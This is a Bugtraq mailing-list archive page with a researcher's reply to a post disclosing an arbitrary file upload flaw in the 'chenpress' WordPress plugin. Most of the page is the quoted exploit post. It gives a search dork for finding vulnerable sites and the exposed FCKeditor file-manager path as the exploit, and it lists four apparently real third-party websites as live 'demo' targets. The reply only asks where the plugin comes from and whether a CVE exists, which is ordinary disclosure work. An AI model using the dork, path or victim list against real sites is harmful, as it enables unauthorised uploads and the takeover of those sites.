Bugtraq mailing list archives

Re: Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability

From: Henri Salo <henri () nerv fi>
Date: Tue, 24 Jul 2012 10:01:15 +0300

On Sat, Jul 21, 2012 at 07:50:54AM +0000, Amir () irist ir wrote:

a bug in Wordpress (chenpress Plugin) that allows to us to occur
a File Upload on a Remote machin.






########################################################################################
#
# Exploit Title : Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability
#
# Author        : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home          : http://IrIsT.Ir/forum
#
# Software Link : http://wordpress.org
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : inurl:"wp-content/plugins/chenpress"
#
########################################################################################
#
#  Expl0iTs :
#
#  http://target.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
#
#
# D3mo :
#
# butcherboysonline.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
#
# atletismosuanzes.com/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html
#
# carnadas.org/blog/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html
#
# downtheaisle.ca/wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/default/browser.html
#
########################################################################################
#
# Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F@rid  
#
# H4x0r - dr.tofan - skote_vahshat - d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy
#
#  Siamak_Black - Shekaf & All Members In IrIsT.Ir
#
########################################################################################


This plugin is not in the official WordPress plugins repository. Where can it be downloaded? Does this vulnerability 
have CVE-identifier?

- Henri Salo

Current thread:

Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability Amir (Jul 23)
- Re: Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability Henri Salo (Jul 24)